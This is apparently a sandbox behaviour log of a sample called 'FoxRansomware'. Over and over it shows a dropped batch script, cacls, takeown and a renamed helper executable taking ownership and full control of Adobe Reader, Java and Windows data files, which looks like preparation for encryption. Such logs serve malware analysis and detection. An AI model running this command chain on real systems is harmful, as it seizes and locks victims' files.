C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "zx______.pfm" -nobanner4⤵PID:3836
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:2052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:3672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵PID:1752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:3684
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:2064
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:3564
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:1164
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵
- Modifies file permissions
PID:1368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "can32.clx" -nobanner3⤵PID:3576
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "can32.clx" -nobanner4⤵PID:2212
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:2060
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:1812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵PID:3796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "symbol.txt" -nobanner3⤵PID:1856
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "symbol.txt" -nobanner4⤵PID:2236
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:968
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:3024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵PID:3932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:3020
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:1468
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:1244
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:3952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵
- Modifies file permissions
PID:1708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3776
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:2656
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3472
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:3092
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:3324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵PID:2180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:4032
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:3716
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1048
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:2728
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:2668
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵PID:2556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "behavior.xml" -nobanner3⤵PID:1768
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "behavior.xml" -nobanner4⤵PID:2608
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4060
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:3848
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:3680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:3224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3056
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:344
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:612
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:3368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:2224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:4036
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:2376
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""2⤵PID:2352
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C3⤵PID:2192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"3⤵
- Modifies file permissions
PID:852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "RTC.der" -nobanner3⤵PID:3568
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "RTC.der" -nobanner4⤵PID:3476
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""2⤵PID:3252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C3⤵PID:3116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"3⤵
- Modifies file permissions
PID:3980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "end_review.gif" -nobanner3⤵PID:2032
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "end_review.gif" -nobanner4⤵PID:2972
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""2⤵PID:3128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"3⤵PID:3392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "reviews_joined.gif" -nobanner3⤵PID:3164
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "reviews_joined.gif" -nobanner4⤵PID:2396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""2⤵PID:2176
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C3⤵PID:2628
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"3⤵
- Modifies file permissions
PID:3484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "server_ok.gif" -nobanner3⤵PID:892
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "server_ok.gif" -nobanner4⤵PID:1076
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""2⤵PID:924
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C3⤵PID:2108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"3⤵
- Modifies file permissions
PID:3604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "warning.gif" -nobanner3⤵PID:3696
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "warning.gif" -nobanner4⤵PID:2908
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""2⤵PID:2852
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:3316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"3⤵PID:2368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MinionPro-BoldIt.otf" -nobanner3⤵PID:1764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "MinionPro-BoldIt.otf" -nobanner4⤵PID:3816
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""2⤵PID:3000
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C3⤵PID:784
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"3⤵PID:4068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SY______.PFB" -nobanner3⤵PID:3556
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "SY______.PFB" -nobanner4⤵PID:1760
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""2⤵PID:2552
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C3⤵PID:2128
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"3⤵PID:3760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "brt.hyp" -nobanner3⤵PID:3296
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "brt.hyp" -nobanner4⤵PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2120
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""2⤵PID:224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C3⤵PID:3912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"3⤵
- Modifies file permissions
PID:2196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "eng32.clx" -nobanner3⤵PID:3188
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "eng32.clx" -nobanner4⤵PID:1636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""2⤵PID:2956
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C3⤵PID:1876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"3⤵PID:1036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CENTEURO.TXT" -nobanner3⤵PID:1924
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CENTEURO.TXT" -nobanner4⤵PID:3216
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3148
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""2⤵PID:3260
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C3⤵PID:3720
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"3⤵
- Modifies file permissions
PID:3016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "UKRAINE.TXT" -nobanner3⤵PID:880
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "UKRAINE.TXT" -nobanner4⤵PID:1664
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:3988
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:3380
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵PID:3120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "background.png" -nobanner3⤵PID:2252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "background.png" -nobanner4⤵PID:2132
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:4084
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵PID:2676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "tasks.xml" -nobanner3⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "tasks.xml" -nobanner4⤵PID:272
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:3548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:3624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"3⤵
- Modifies file permissions
PID:1632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:3512
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:1368
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2140
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:3080
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:3768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵PID:2220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3668
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:1596
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:1912
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:2060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:1280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:3024
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵PID:1836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:988
-
-
